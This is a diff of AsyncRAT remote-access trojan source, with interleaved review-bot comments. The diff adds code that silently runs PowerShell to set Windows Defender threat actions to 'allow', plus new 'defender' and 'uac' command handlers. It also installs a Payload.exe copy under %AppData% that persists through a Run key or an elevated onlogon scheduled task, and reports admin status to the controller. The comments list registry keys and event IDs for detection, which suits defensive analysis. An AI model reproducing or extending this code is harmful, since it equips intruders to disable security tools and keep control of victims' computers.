-HighThreatDefaultAction 6 -Force"); // high level threat // Allow + + else if (line.Contains(@"ModerateThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -ModerateThreatDefaultAction 6"); // moderate level threat + + else if (line.Contains(@"LowThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -LowThreatDefaultAction 6"); // low level threat + + else if (line.Contains(@"SevereThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -SevereThreatDefaultAction 6"); // severe level threat + } + } + + private static void RunPS(string args) + { + Process proc = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = "powershell", + Arguments = args, + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true + } + }; + proc.Start(); + } + + } +} diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index 7836bac..eac8782 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -25,35 +25,47 @@ namespace Client.Handle_Packet case "sendMessage": { MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString); + break; } - break; case "Ping": { Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString); + break; } - break; case "thumbnails": { new HandleGetScreenShot(); + break; } - break; case "sendFile": { Received(); new HandleSendTo().SendToDisk(unpack_msgpack); + break; } - break; case "sendMemory": { Received(); new HandleSendTo().SendToMemory(unpack_msgpack); + break; + } + + case "defender": + { + new HandleWindowsDefender(); + break; + } + + case "uac": + { + new HandleUAC(); + break; } - break; case "close": { @@ -64,8 +76,8 @@ namespace Client.Handle_Packet } catch { } Environment.Exit(0); + break; } - break; case "restart": { 
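Review bot: The only description of the new HandleWindowsDefender.cs is the header line "Disable Windows Defender v1.0", and nothing in the file records which host settings the constructor changes, which is what an analyst or responder needs from it. A summary comment on `HandleWindowsDefender()` should list them as written here: four `Disable*` values under `HKLM\SOFTWARE\Policies\Microsoft\Windows Defender` and its `Real-Time Protection` subkey, `TamperProtection` under `SOFTWARE\Microsoft\Windows Defender\Features`, then one `powershell Get-MpPreference` read and a hidden `powershell Set-MpPreference ...` child for each preference still at its protective value. `RegistryEdit` swallows every exception with `catch { }`, so the client keeps no record of success or failure and host telemetry is the only evidence. That evidence is registry auditing on those keys, process-creation logging for `powershell` with `Set-MpPreference` arguments, and Defender operational-log events 5001 and 5007. On hosts with Tamper Protection enabled these changes are expected to be blocked, which the comment should state as well.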
@@ -77,14 +89,14 @@ namespace Client.Handle_Packet catch { } Process.Start(Application.ExecutablePath); Environment.Exit(0); + break; } - break; case "uninstall": { new HandleUninstall(); + break; } - break; case "usbSpread": { diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs index bdf14dd..0b53413 100644 --- a/AsyncRAT-C#/Client/Install/NormalStartup.cs +++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs @@ -3,6 +3,8 @@ using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; +using System.Security.Principal; +using System.Threading; namespace Client.Install { @@ -29,14 +31,31 @@ namespace Client.Install FileStream fs; if (File.Exists(Settings.ClientFullPath)) + { + File.Delete(Settings.ClientFullPath); + Thread.Sleep(1000); fs = new FileStream(Settings.ClientFullPath, FileMode.Create); + } else fs = new FileStream(Settings.ClientFullPath, FileMode.CreateNew); byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName); fs.Write(clientExe, 0, clientExe.Length); fs.Dispose(); - Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath); + if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) + Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath); + else + { + Process.Start(new ProcessStartInfo() + { + FileName = "schtasks", + Arguments = $"/create /sc onlogon /rl highest /tn {Path.GetFileName(Settings.ClientFullPath)} /tr " + "\"" + Settings.ClientFullPath + "\"", + CreateNoWindow = true, + ErrorDialog = false, + UseShellExecute = true, + WindowStyle = ProcessWindowStyle.Hidden + }); + } Methods.CloseMutex(); Process.Start(Settings.ClientFullPath); Environment.Exit(0); 
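Review bot: The new elevated/unelevated branch in NormalStartup.cs has no comment saying which autostart mechanism each side creates. A line such as `// Unelevated: HKCU ...\CurrentVersion\Run value named after the file; elevated: schtasks ONLOGON task at highest run level` above the `if` would document it, and the same split is mirrored for removal in HandleUninstall.cs. Both artefacts take their name from `Path.GetFileName(Settings.ClientFullPath)`, which Client/Settings.cs sets to `Payload.exe` under `%AppData%` by default. The indicators are therefore a Run value or scheduled task named like an executable file and pointing into the user profile, a hidden `schtasks /create ... /rl highest` process, and Security event 4698 where task-creation auditing is enabled. The enclosing method starts and ends outside the hunk.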
diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index f9722c6..6cdf390 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -9,7 +9,7 @@ namespace Client { public static string Ports = "6606"; public static string Host = "127.0.0.1"; - public static string Version = "AsyncRAT 0.4.6"; + public static string Version = "AsyncRAT 0.4.7"; public static string Install = "false"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); public static string Password = "NYAN CAT"; diff --git a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs index a06ca35..582d9f5 100644 --- a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs +++ b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs @@ -8,6 +8,7 @@ using System.IO; using System.Net.Sockets; using System.Threading; using System.Text; +using System.Security.Principal; // │ Author : NYAN CAT // │ Name : Nyan Socket v0.1 @@ -80,6 +81,7 @@ namespace Client.Sockets Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit"); msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName; msgpack.ForcePathObject("Version").AsString = Settings.Version; + msgpack.ForcePathObject("Admin").AsString = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString().ToLower().Replace("true", "Administrator").Replace("false","User"); TheCPUCounter.NextValue(); msgpack.ForcePathObject("Performance").AsString = $"CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%"; return msgpack.Encode2Bytes();